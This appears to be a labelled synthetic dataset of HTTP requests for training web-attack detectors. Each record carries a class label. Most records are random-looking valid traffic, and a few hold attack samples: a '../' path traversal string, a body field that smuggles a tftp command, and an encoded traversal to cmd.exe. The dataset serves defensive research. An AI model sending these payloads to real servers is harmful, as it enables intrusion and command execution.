X-Serial-Number: 787765977
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37780
Start - Id: 6884
class: Valid
POST /ekmyR85hGK0mXXLTCq/t9enrhl4c/ge/i4OEp6gt0T1GO01Jd/mv0yu4HP/3havingCzidL3RQ7/tFbGBPyHZ@mf8x83/MuhyoUrornmono/etWcbhcebiZt/4cG3IJYPiiU7M/ewvzZ@lQkchLpn0.jpg? HTTP/1.0
Content-Length: 64
Content-Language: eewd
Content-Encoding: identity
Content-Location: http://Ioe3.net/oneqjn.avi
Content-MD5: bGhldW9wcnZhNWVudG91cQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 09 Apr 09 03:36:01 GMT
Last-Modified: Wed, 13 Jul 05 23:54:42 CET
Host: www.icrutvs.net
Connection: fnwh
Accept: */*
Accept-Charset: shift_jis, iso-8859-8, ks_c_5601-1987
Accept-Encoding: 
Accept-Language: b-o;q=0.5, 9G5-dmeatgcs, teeeaI-qyin4, refngtl-ra;q=0.1
Cache-Control: nl=ssofEir
Client-ip: 36.160.70.16
Cookie: la=343357;hsnimtax=er6iaq
Cookie2: $Version="18"
Date: Wed, 31 Oct 07 24:40:06 UTC
ETag: "AR_t4pvKsG9QSCYlj"
Expect: onEoapn4=rlrg5;xate=bhaeer
From: 1m1ll@ibidpns.org
If-Modified-Since: Wed, 01 Dec 04 23:01:59 GMT
If-Unmodified-Since: Tue, 13 Jun 06 21:53:55 UTC
If-Match: "zg6GpZ@VPXgLdTr"
If-None-Match: "Ld6F7E4WT8UwP6zBR3W"
If-Range: Sun, 15 Oct 06 07:35:51 UTC
Max-Forwards: 1
MIME-Version: 1.0
Pragma: no-cache
Proxy-Authorization: Digest uri=http://nsa5.net/jIlhTi.rar
Authorization: Digest nonce
Range: -93,35-
Referer: /awoddr/uPiir/tl6Yadny/wapvbn/rs8SoMu.bin
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/0.8 (Windows; U; WinNT 8.0; mb-le; rv:8.6.1) Gecko/02941351
UA-CPU: x86
UA-Disp: 2306,5662,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 496x5279
Via: FTP/6.2 80.53.61.252:44, FTP/7.8 www.oat2.js
Transfer-Encoding: r8oh
Upgrade: pePaai/6.4, heot/7.3
Warning: 207 www.7yee.shtml "rotcrNusEy3ganeoytl" "Mon, 04 Feb 08 07:34:03 GMT"
X-Forwarded-For: 230.208.82.135
X-Serial-Number: 65434343667649
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

ctt=oaccess_logEneny od9nabhu&o_qvdocumentk8PgjG=ieCcita3andthtj

End - Id: 6884
Start - Id: 45023
class: PathTransversal
PUT /QBnph-8evalzrQqrBwp-/hcTeeaTw/ix3yPh3w0jed/iWWTU1StRdU@.swf? HTTP/1.0
Content-Length: 194
Content-Language: hesmc,am
Content-Encoding: gzip
Content-Location: http://ck4e.ch/eraeyf7/erteoham/tnNc/rtMx/tlesq.exe
Content-MD5: dGN0dHNpYnNhbHJFbGJrdA==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Mon, 22 Jan 07 07:33:58 CET
Host: www.6r2e8ee3f.be:87503
Connection: close
Accept: */*
Accept-Charset: windows-1255;q=0.1, x-mac-japanese;q=0.8, iso-8859-1;q=0.6
Accept-Encoding: ./.././.././.././../
Accept-Language: *
Cache-Control: 6adnd1='7s'
Cookie2: $Version="6"
Date: Tue, 13 May 08 01:02:47 CET
Expect: 100-continue
If-Modified-Since: Fri, 21 Sep 07 11:59:12 UTC
If-Unmodified-Since: Sat, 26 Dec 09 12:35:17 CET
If-Match: *
If-None-Match: "N0I9HMUMuHzS7iIFGE1"
If-Range: Sat, 05 Dec 09 03:48:23 GMT
Max-Forwards: 82
Authorization: Basic Y2hTZXJzbDplcmVkbQ==
Referer: /8ifiwrte/acahfuaa/j7anriO/seodooz.php
TE: trailers,trailers,gzip
Trailer: Host
User-Agent: eesnd (tq-Ko_oILl; rpYrurqhEX; eM2r@L3RX; uXB_cGtPKo; gIKKNL)
UA-Disp: 2107,9103,32
UA-OS: Linux
Via: jXa/6.6 20.174.26.220:59, FTP/5.4 21.30.134.96, 5.6 www.Ejjinlly.jpg
Transfer-Encoding: compress
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

5asosttSw=5&taLoh=8n&sVsws5raPeeOtda=98&adanse=pa|ne&3flh4eeoheM2h6r=01&ssJG1vfara=e-&lahU=9945370&humlIYbJG.s=<ndcdoEw8eiiadm&1m4vf=sn.4NXID_0y.&wm=6551702&2rhntaTPwi=eOk&rbr5n37=82&izd0=95

End - Id: 45023
Start - Id: 44569
class: OsCommanding
POST /pt/l1Y_G1Vdf/eghu7rh/ocuenNefnaeadpvrto/nsneilitv/eg2zkbMqEiCirN/oWssrcahs/eAyCNUxAGE0gby43.5f/aEA2gRuuwF_@7NQCt.php? HTTP/1.0
Content-Length: 151
Content-Language: anRO8zv3,nsn,Ut2
Content-Encoding: compress
Content-Location: http://www.dizuYlf5.gov/3eix/8hnin/tEdh/hlefoe/a9cer.shtml
Content-MD5: ZXNzczhlNGVlaEJhbzNlYw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 03 May 08 13:23:32 GMT
Last-Modified: Tue, 02 Dec 08 23:28:17 UTC
Host: www.kk2ttr.de:3
Connection: close
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 10.34.240.53
Cookie: ritAeeDSxouanR=Op>hfiHl h
Date: Fri, 05 Jan 07 16:13:20 GMT
ETag: "Pdu5B-rYB0AW_8GO"
Expect: uwsaltSm=5myteE;eo7otdz=thwSy7x0
If-Modified-Since: Thu, 20 Mar 08 07:33:29 UTC
If-Unmodified-Since: Wed, 06 May 09 12:33:04 GMT
If-Match: "gTPoAHpVZezeUIwt8"
If-None-Match: *
Max-Forwards: 3622
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: rnerea 2nhwteS=toea
Authorization: Basic dGJya3R3aGg6cEhpNWR0
Referer: /hp8lAey/5Nae6on6/30f5.dll
TE: gzip;q=0.4
User-Agent: caudafyedg/2.5.6.3
Via: FTP/5.6 178.17.91.193, HTTP/6.1 184.42.102.206, 9.3 www.mceleeS.htm
Transfer-Encoding: compress
X-Forwarded-For: 21.178.56.88
----: --------------------------------

itr=109.122.226.255+++%3B++++tftp+192.168.10.33+test.txt&Ohome8rR0VoA@_=138525&QlLt=fey1&76lFhi=9xXKbXEgsNda&ef5=sso%3A&hnua=nph-x&4T-Pmail%uM@SKI=o+nt

End - Id: 44569
Start - Id: 43861
class: OsCommanding
GET /msadc/..%5c../..%5c../..%5c/..�../..�../..�../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.caonajm.uk
Connection: close
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: gzip;q=0.2, deflate;q=0.9
Accept-Language: u-pkSx;q=0.2, wvn-eos67stl, eLsnrt6-o9pdic
Cache-Control: only-if-cached
Client-ip: 165.236.64.199
Cookie: deahOtuIelL=sngmhdr;n2d=efs.Ho.frOTK;rensaytiinyhaga=em4epsTcufRae;h2eUimhkeh=sa%I;relerBkczmou=onl;b09EY292=5Dehtaccesf:md
Cookie2: $Version="8"
Date: Fri, 13 Jun 08 12:06:00 GMT
ETag: "HEbQ33-SkVt2EnOI24b"
Expect: 100-continue
From: nxa0tn0@Cododus.net
If-Modified-Since: Mon, 19 Apr 04 12:20:52 GMT
If-Unmodified-Since: Thu, 31 May 07 08:10:28 GMT
If-Match: "iT.aZsHebK.VkG68xcBy"
If-None-Match: "ZJLZhg2yTBia3IW"
If-Range: Fri, 25 Aug 06 12:17:59 UTC
Max-Forwards: 005
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: Digest cnonce="tRstaerb"
Authorization: Digest qop=tTfrtNsH
Range: 91796-,027282-114595
Referer: http://iNyeoATe.de/Tnddmlce/dUrimht/elSAmgNb/hehTee7.cfm
TE: trailers
Trailer: User-Agent
User-Agent: depst/8.5.0.5.6
UA-CPU: PowerPC
UA-Disp: 191,2261,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 629x1097
Via: gZ1naf/1.2 www.whufar.js
Transfer-Encoding: tdfaN
Upgrade: 0a7on5/8.8, emazee/1.9, 1hodgr/0.0, auiinp/3.7
Warning: 298 94.217.207.58 "Eds2iystmt" 
X-Forwarded-For: 69.99.5.109
X-Serial-Number: 77798884304573720348
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 43861
Start - Id: 8144
class: Valid
GET /oztcatFN/ed-TMCZkMQtkK/r31ptear/l5nC1HVH2mCU04s6H5@X/npsRttnsse6r/narrtrtilymt/NIdTeNQ/eewano5imoOonr5TIiym/e1ekan9/eMe@YZx.nsf?jCeEe6i5a=rGwX HTTP/1.0
Host: 176.164.23.87
Connection: close
Accept: */*;q=0.3
Accept-Charset: x-mac-icelandic;q=0.3, euc-kr;q=0.6, windows-1255;q=0.9, us-ascii
Accept-Encoding: compress
Accept-Language: *
Cache-Control: cu=sz8
Client-ip: 226.231.245.62
Cookie: ors7p5inte=p@;rmts=ar?tieqlinkp
Cookie2: $Version="1"
Date: Tue, 18 Sep 07 22:03:51 CET
ETag: "hGczzMeUEWANFKa"
Expect: hwptt40
From: bHa9Ixr@cydbhep.be
If-Modified-Since: Tue, 07 Apr 09 10:51:38 UTC
If-Unmodified-Since: Thu, 02 Dec 04 17:44:03 GMT
If-Match: "J956Lu_CWE-RV7gM"
If-None-Match: "3M@oVf@vwmeB3t@"
If-Range: Wed, 24 Feb 10 16:52:02 UTC
Max-Forwards: 050
MIME-Version: 8.3
Pragma: no-cache
Proxy-Authorization: icItwz 0ideTrr=voci
Authorization: N4cN tEht=rnnodR6
Range: -340,51-69621,105-24
Referer: /t2ake2hn/geat/Eeeea/ieLrToo/tfsnh.swf
TE: trailers,chunked,trailers
Trailer: TE
User-Agent: rEsha (a7eSYS@; rTc5..; 8CwqN0-KrD; kMFC6pEhC; s9ZCcC)
UA-CPU: StrongARM
UA-Disp: 4611,8979,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 959x056
Via: HTTP/5.3 www.irWoOia.gif, 2.3 14.32.8.7, HTTP/3.5 www.idas4.jpg:96
Transfer-Encoding: deflate
Upgrade: 2eUjto/5.2, tqac/7.0, p0oik/8.4, 1mkNa/0.5
Warning: 489 www.eptt.jpg "7ceEepaUoi6" "Mon, 12 Oct 09 20:07:00 CET"
X-Forwarded-For: 110.129.233.176
X-Serial-Number: 87696884099518703
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8144
Start - Id: 21548
class: Valid
GET /D0/Uf1B4/lDgOfAGcDMtp6.html?g4nar45pf=ohtd&nrittvxogmouc8=egnal&A.I%u=Eioi&V4isWo3.Jexecx=572380028&QphpLeCWzjJut=5&le4C=mFT2N7Gb&eot0Ryon52=tiWgkkD&dr7e9nhyubna=nmijt9Tah2otdu6&xea0d=wp-lib+eIc%3F HTTP/1.0
Host: 105.8.186.107
Connection: keep-alive
Accept: audio/*, video/*
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: n6-itokt;q=0.6, ng-n;q=0.5, hl6eg-ognnoe;q=0.2, E-elC, elon-ei;q=0.3
Cache-Control: no-transform
Client-ip: 149.105.42.160
Cookie: 5yrl=Adao4xndiir7
Cookie2: $Version="213"
Date: Sat, 02 Sep 06 03:26:35 GMT
ETag: W/"P0iQnQIgBdMSBXJ837Z8"
Expect: 100-continue
From: t1Gpd0t@aonx3yb.biz
If-Modified-Since: Mon, 25 Jul 05 10:38:41 CET
If-Unmodified-Since: Sun, 29 Mar 09 21:06:43 UTC
If-Match: *
If-None-Match: "wOuUVWYoJG8TSonsL"
If-Range: Sun, 15 Jun 08 22:18:04 GMT
Max-Forwards: 902
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: NTLM dGF4RGdHb2kxNGh0b2IzaHRvYWQzdHRhdUVJc3BpaWNBTg==
Authorization: Digest opaque="gyss"
Range: 2514-,-4567,968-760
Referer: /afte/cmcsbal.php
TE: gzip,gzip,gzip;q=0.5
Trailer: Referer
User-Agent: Mozilla/9.5 (Machintosh; U; PPC Mac OS X 6.0; fu-dd; rv:7.4.9) Gecko/49947803
UA-CPU: StrongARM
UA-Disp: 9153,8066,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 0542x2765
Via: 4.7 225.162.97.108, FTP/3.6 www.1uese2.jpeg
Transfer-Encoding: hndh; tetr=1granah
Upgrade: dmh/1.5, elpleh/2.3, bhbR/2.5, axes/9.3
Warning: 105 194.179.101.101:797 "yfe4eht3aAartosoia" "Tue, 19 Jul 05 17:23:33 GMT"
X-Forwarded-For: 225.114.104.225
X-Serial-Number: 42015
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21548
Start - Id: 15350
class: Valid
GET /roi/bspbZajtKcGeob/rH0.Zqn.jpeg? HTTP/1.0
Host: www.yaN5.de
Connection: ehD6l
Accept: */*
Accept-Charset: *
Accept-Encoding: identity
Accept-Language: *;q=0.7
Cache-Control: max-age=2
Client-ip: 21.23.172.64
Cookie: ElShVP=669429;umosoriLi0=)uw6E;h0ai27i6dth=54429822;ye4e=9;reTnErtiae=dJeoqg3cj;inieB=adnfll
Cookie2: $Version="08"
Date: Fri, 02 Jul 04 13:00:22 UTC
ETag: "pm7fOh_WGJjkGQfC"
Expect: fdseu
From: oohipchi@amhkotnMr.uk
If-Modified-Since: Sun, 18 Jun 06 03:38:38 CET
If-Unmodified-Since: Sat, 31 Jul 04 21:23:04 CET
If-Match: "EzU3@@6BGmmmsmtsgLvf"
If-None-Match: "kzFoi31_t56j6Yu9FyG"
If-Range: Sun, 04 May 08 20:13:25 GMT
Max-Forwards: 195
MIME-Version: 4.2
Pragma: no-cache
Proxy-Authorization: Digest uri=/sart/maiDt4V.dll
Authorization: l8rer Iets2ttn=a1mdng
Range: -20607,08-,-679023
Referer: http://www.usoes.uk/etm1/tfsqtune/s3dmu.tiff
TE: trailers,trailers
Trailer: If-None-Match
User-Agent: urc0yozot/6.9.2
UA-CPU: StrongARM
UA-Disp: 4712,7583,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 065x683
Via: 5.8 143.169.155.120:6, 4.7 167.214.208.180, HTTP/3.7 www.rEau4t.tiff:98853
Transfer-Encoding: identity
Upgrade: Tlel/3.6, uAR/9.8, are/8.8, cso/3.7
Warning: 486 147.132.247.92 "m5pjeocbh" 
X-Forwarded-For: 139.65.0.173
X-Serial-Number: 7835814731
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 15350
Start - Id: 16164
class: Valid
GET /mv.IN2fhz9bRO/eGWemYSBAQeAi_lr.G/imc7PX/tta6ihos3u14eIrso/Gstyle7pYC85inYw4/LE-/eDZht5WEwa2QPxYXrQt.css? HTTP/1.0
Host: 205.246.156.187
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: 
Accept-Language: ihtu-0oistrt;q=0.3, Eeeeea-lhhi;q=0.4, oeAvge-nsne9n6;q=0.3, Ao3etx-eAtjhe;q=0.0, o-pa
Cache-Control: no-store
Client-ip: 163.65.92.102
Cookie: smleuein=l ;trpeyA5asdd=nELfc;zsystembCu=i;terla=:+otilitjw n6e2d;Eea=allvar]e
Cookie2: $Version="737"
Date: Fri, 06 May 05 14:06:30 CET
ETag: "RPeD2251fsD7P4nBAkey"
Expect: 100-continue
From: mEck5@aosi.it
If-Modified-Since: Sat, 26 Aug 06 24:16:00 UTC
If-Unmodified-Since: Tue, 16 Mar 04 08:52:57 GMT
If-Match: "B@3icLovzMezwFqO"
If-None-Match: *
If-Range: "f58y7ul1uVdgUuMO"
Max-Forwards: 407
MIME-Version: 7.0
Pragma: hYn='euAgg'
Proxy-Authorization: Digest username="nFeSct7"
Authorization: eTnft 6oio6=cetm
Range: -0401,-5888,85828-61
Referer: /inbq/dhil/5irr1r/rade0nal.exe
TE: gzip;q=0.9,trailers,trailers
Trailer: Referer
User-Agent: ieegueRdet
UA-CPU: PowerPC
UA-Disp: 1227,627,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 846x8936
Via: FTP/7.0 www.e3upy9e.tiff, 1.5 193.84.239.182, 7h5cw/0.4 242.245.55.87
Transfer-Encoding: gzip
Upgrade: fatonx/1.7, 3c2/0.8, 5net/4.7
Warning: 454 www.8icditia.html "fbenTdedlumlppa" 
X-Forwarded-For: 137.131.109.193
X-Serial-Number: 823993
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16164
Start - Id: 16675
class: Valid
GET /26KxgoTgVJuXyOG/eO27hzumad3UR7iyNatn/8t0tRoohtuithwk/tOk_y7_T/e5bB/fTlKeJFdwf/eoec1hfsui/e_0O6zFSqF1aDZv/Cb7rcuotNNne4/ip_nI/np5te4tees9aH38t.jsp?totduS=05270&trawcoibt=978&hWOn=6hprvwhere&st=m1iistes&nniehzie8=437&onileteio=dtLamne8epmocaed7h&sb6-delete0.AobjectL=dDW&w5yneOa4h=790&ehayiote=+Qatiircpm%3FtIs%24&_y48XWnq=56789289&XhtaccesO7R.5=ln6eS%3F9 HTTP/1.1
Host: www.iEzaefn7h.com
Connection: serattS
Accept: video/mpeg;q=0.1, text/*, image/png;q=0.4
Accept-Charset: x-mac-chinesesimp;q=0.7, iso-8859-3, utf-7;q=0.5, euc-cn;q=0.2
Accept-Encoding: compress;q=0.8, deflate
Accept-Language: p-tti1auy, bEn-spf, a-SsUh
Cache-Control: no-cache
Client-ip: 205.215.21.148
Cookie: He3qtimT=bwYUwsT
Cookie2: $Version="9"
Date: Mon, 26 Dec 05 16:27:43 CET
ETag: W/"iSyHmqE12WxNZl-P"
Expect: 100-continue
From: noedlreb@rlhth.be
If-Modified-Since: Sat, 17 Jan 09 09:57:26 CET
If-Unmodified-Since: Thu, 26 Apr 07 07:59:22 GMT
If-Match: "OyLC-kVnVKqquVgpemB"
If-None-Match: "_X4pfU38D1cfSp-JjyAG"
If-Range: *
Max-Forwards: 744
MIME-Version: 2.5
Pragma: no-cache
Proxy-Authorization: Basic ZXVUV3A6c29iYXJyZU8=
Authorization: Digest username="nEch"
Range: -9453,5-40420,64432-847429
Referer: /19se/egcdifh/n6beTi/tDrrielE/oonvhhwn.nsf
TE: deflate,trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/7.1 (X11; U; Linux i586 2.0; ho-su; rv:4.6.7) Gecko/88298766
UA-CPU: StrongARM
UA-Disp: 0786,0517,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 6609x7402
Via: 8.7 www.nfeE.shtml, 9.0 www.exzoh.html
Transfer-Encoding: gzip
Upgrade: bt5iw/9.8, eelOhb/1.7, sstab/7.9, e3e/5.2, ifooo/5.5
Warning: 890 www.nUiou.jpeg "oe52aLer" 
X-Forwarded-For: 241.107.33.0
X-Serial-Number: 6490283013114622
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16675
Start - Id: 12090
class: Valid
GET /36-Afrom.6foAux/cktmfganviatshmo/jYVDfwZTC/nslntwOe/i4dWdc-DtX4Jd3APgK/Tug2tGruiScfyf.cfm?ssEegwR=ex5uG_uis&tbomtmrtn=1&dropeTta=th4sEtKe5Ees&whXdDshbhopfn=nC-TK.JF&8vjU1=locationH6rg&et6ynAJtaoo=FeyO9tkl0hakaoSIl&re0smddi=620&M3Niu=insert9&sleaoi=bHuo&lsanireg=6405&hoPe7=55671&eithlueSdwsx=cadeoscathemSomy&zafnNtyNlq=bjtJOn_2&P6h5l2UZvXj@=14965 HTTP/1.0
Host: 99.56.147.77:23
Connection: keep-alive
Accept: audio/*;q=0.5
Accept-Charset: iso-8859-15;q=0.7
Accept-Encoding: 
Accept-Language: k-ny, rehTaaeA-n;q=0.9, 2ifis-nltniAhe;q=0.3, hr-ng4, a9l-aaEota;q=0.1
Cache-Control: min-fresh=5783
Client-ip: 229.43.6.180
Cookie: HFUhavingozbody6C=goAcwos\kn[]4pse;KQ.pQR=i nandm;arhuVnZe0yeye=snlsis nseroeeta
Cookie2: $Version="438"
Date: Tue, 14 Jun 05 16:21:02 GMT
ETag: W/"ykRWpgCszwkMMqM1Fb"
Expect: onaNtti6=wymieb
From: uo62eumo@wietooDoc.it
If-Modified-Since: Tue, 21 Oct 08 15:23:53 CET
If-Unmodified-Since: Tue, 20 Jul 04 19:01:16 UTC
If-Match: "vaDEl@8trtECnW_EBNL"
If-None-Match: *
If-Range: Mon, 01 Mar 04 17:03:05 CET
Max-Forwards: 5
MIME-Version: 2.4
Pragma: no-cache
Proxy-Authorization: NTLM cXlncnZpOW9qcmppYTlvdHFvODZiM2Rpcmx5dXR5bWVvbGFndDhhZThybDd2
Authorization: NTLM dGZBMnNlcmhvZWhqZHBzcGpkY2VhYW5xZXlodXVlY205cnR1ZWV6YmV2bnNiZWM=
Range: -59437
Referer: /qariddoo.cgi
TE: trailers,chunked;q=0.4,chunked;q=0.6
Trailer: Trailer
User-Agent: Mozilla/6.0 (Machintosh; U; Mac OS X 1.9; mw-Is; rv:3.8.4) Gecko/92020994
UA-CPU: Sparc
UA-Disp: 750,6227,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 802x8230
Via: 1.5 34.155.212.9, 3.3 www.leihn5.htm
Transfer-Encoding: deflate
Upgrade: agae/3.5, l79so8/7.9, aG6/1.3
Warning: 364 www.rnndhhu.html "lNiB7of9mccT8t4" 
X-Forwarded-For: 149.30.227.159
X-Serial-Number: 739755
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12090
Start - Id: 4774
class: Valid
PUT /sFaDn_.msf? HTTP/1.0
Content-Length: 17
Content-Language: iP7rl4
Content-Encoding: deflate
Content-Location: http://srcP8re7.uk/asooeolj.tar.gz
Content-MD5: aHJjZXRhTWxvbXh0aGk5Yw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 12 Apr 08 18:17:45 CET
Last-Modified: Wed, 09 Jun 04 03:11:57 UTC
Host: www.nsT8os.uk:21945
Connection: tsli
Accept: text/plain;q=0.7, text/*, application/*;q=0.2
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: eeob-unxeD3;q=0.2, o9iei-rbsrNite, 2hte-sSGeGots, tto8tv-euish
Cache-Control: q3='io'
Client-ip: 187.93.237.97
Cookie: tasaqsln=sn3gss89u;d@Rvz2=596869;scriptdzo6T=ietRsecho;dro=lrko
Cookie2: $Version="1"
Date: Tue, 11 Jul 06 02:39:13 CET
ETag: "GPybwSQZgNrBAHl1mQL9"
Expect: mijtq5m
From: eusrek@6EeaAEdeOD.it
If-Modified-Since: Wed, 29 Nov 06 21:47:09 GMT
If-Unmodified-Since: Mon, 09 Jul 07 04:08:05 UTC
If-Match: "nnI7WeH-l5z5NobTz"
If-None-Match: "s.CkVj1V@k8Gs8wO7IP0"
If-Range: "YlqFmYIjNLZK9dYU672."
Max-Forwards: 2
MIME-Version: 0.4
Pragma: nesstue='vOA'
Proxy-Authorization: Digest uri=http://www.efttzis.be/nlrez/ltpeh/rkieoIj.gif
Authorization: hpLcsa rrpn3nbs=naldo
Range: -223574,77-
Referer: http://www.sbgo.net/Eiamel3/Ixa63as/s8nas/rqkpm.jsp
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: mygyTTnehS (hKmhRRgQ6K; qUtz4B73C9; e2vQWuBQof)
UA-CPU: PowerPC
UA-Disp: 717,3860,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 163x2110
Via: rmnarl/7.6 www.ejrgsy.shtml
Transfer-Encoding: deflate
Upgrade: zedlh/8.1, naR/6.0, eeufs/3.6, reei/8.9, fshaut/4.2
Warning: 541 246.190.52.10 "Lgejbyurversetq" "Sat, 20 Jun 09 14:22:24 UTC"
X-Forwarded-For: 247.63.27.49
X-Serial-Number: 095672914255730
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

s4me3gdlehsvido=n

End - Id: 4774
Start - Id: 33923
class: Valid
POST /f.IJMZhjfemstyleOh/i1LXUJl/aw/rehsIhrdqemniottsse/aLFnW-4-cmYIi/arB/dk@2/cetsnu/oxq/tatsa9Oeilreadss.php3? HTTP/1.0
Content-Length: 75
Content-Language: erd,uborohKa,gaanu
Content-Encoding: gzip
Content-Location: /shcw20/ho8rdc/rots3rt9.conf
Content-MD5: TzJodmVuRUFuZHRBNnllZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 23 Feb 10 01:36:55 UTC
Last-Modified: Tue, 07 Apr 09 19:36:17 UTC
Host: 58.46.104.181
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: cp-950, iso-8859-7, windows-1253;q=0.6, x-mac-greek
Accept-Encoding: *;q=0.8
Accept-Language: trah-i3N, cEe8hee-tGtix;q=0.2, hte-Agitd, lc-5bqt;q=0.3
Cache-Control: only-if-cached
Client-ip: 248.12.106.141
Cookie: qyfs=Spasswdeejwsa%hchildar;Twindow.openBnk=2751
Cookie2: $Version="05"
Date: Wed, 27 Jun 07 17:16:09 CET
ETag: "sBOIf.P@_4EIFh0Y"
Expect: t3swm=Toyil
From: faUspl3@yqiAa4o.it
If-Modified-Since: Thu, 28 Dec 06 18:46:24 UTC
If-Unmodified-Since: Tue, 15 Feb 05 19:15:42 GMT
If-Match: "vDTDzCzExLhWNU-bNvg"
If-None-Match: "Uqf5BzC_d8KCgYWOJHyM"
If-Range: Sun, 13 May 07 03:51:52 UTC
Max-Forwards: 56
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: ddre3t eDfhi=ueIeutii
Authorization: Basic M2ZyNGhwNmw6ZXNjcHJsb3A=
Range: -996,858-589875
Referer: /mhnltaCq/ureiwtu.gif
TE: chunked;q=0.6
Trailer: From
User-Agent: Mozilla/8.2 (Machintosh; U; Mac OS X 7.8; hn-oa; rv:0.5.0) Gecko/19502493
UA-CPU: Sparc
UA-Disp: 4653,644,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 1982x002
Via: HTTP/9.7 245.224.95.170
Transfer-Encoding: gzip
Upgrade: mtiv/1.9, Samgmt/6.9, enjtl/7.4
Warning: 795 168.131.85.71 "htNrsta0stixj" "Thu, 18 Mar 04 22:40:39 GMT"
X-Forwarded-For: 7.63.26.112
X-Serial-Number: 346952667269
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

snratotrnun=143&4VD3c=8744682632&DhAsn=4066022119&ie=e2srI'ecifc&Tn=eaatl

End - Id: 33923
Start - Id: 16087
class: Valid
GET /reIr/oosOarcqnyrE7dlvl/p2po2yMyn2eamatDsdu/rayb0oo/eLL8MQR9be5rDBd_Q-hu/ttd4eucnsns/ssvIEXXMuFanF_Wb/k4j3tfow@.hoDsOWWE/w3cR3d1p0/r3dfuahnrwvb.mspx?enml4lniacuwgcw=linkv+os&0liym=45&rtn1Itns8He=oUq&vrZ_H=watsbwyo2awD&hiaeii2nl=iicdandhbinttwgetgtaIsa&inqperegN=50&ics=TdiJsi+Cterhm&f@iv=87299&cmsdi=ei6leEe7passwdojna&R1T1tR=uA8&ishmnlaet1=t-uXHUheY HTTP/1.1
Host: 158.83.218.181
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: gb2312
Accept-Encoding: identity, gzip;q=0.2
Accept-Language: ianv-p;q=0.5
Cache-Control: min-fresh=86
Client-ip: 46.71.143.53
Cookie: il=-t;la=75145943;twEfaDg=%2Bcwjscpwghduhg;hheiaItaoui=58567;V8yr_3.zx%u=02009439
Cookie2: $Version="420"
Date: Mon, 13 Mar 06 07:29:08 UTC
ETag: W/"nBuxQGFcUnj7XZO0ZXW"
Expect: 100-continue
From: nsodrd@t9uule.biz
If-Modified-Since: Thu, 04 Feb 10 01:06:23 GMT
If-Unmodified-Since: Sun, 18 Jan 04 05:29:28 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 14 Nov 09 08:48:01 GMT
Max-Forwards: 5
MIME-Version: 5.7
Pragma: no-cache
Proxy-Authorization: Digest cnonce="Sas09gl4"
Authorization: NTLM U250Ynp0aFJobWV3bmVSdG96dUt3bmFsaGhoZWZ2NEgwd3Nlbw==
Range: 303812-992,8-0,-1
Referer: http://jEelkt.cz/7tiwy3/0Odber/trdn.js
TE: trailers,chunked;q=0.1,gzip
Trailer: If-Modified-Since
User-Agent: Se7eF1ii (s_PbLZ3; etXcSmro; eTGF1mcjcZ; yyVgfWW)
UA-CPU: x86
UA-Disp: 489,939,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 892x2376
Via: HTTP/0.0 36.109.113.128, HTTP/8.2 www.fh3io.htm, FTP/4.3 178.209.108.55
Transfer-Encoding: identity
Upgrade: i4yIiA/2.7, dii5he/8.6, ahi/6.9, hzes7/4.4, 3Ooah/2.1
Warning: 947 237.230.136.104 "emhixriherlerH7tA" "Fri, 12 Jan 07 18:24:13 UTC"
X-Forwarded-For: 44.155.173.100
X-Serial-Number: 6495346475
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16087
Start - Id: 11859
class: Valid
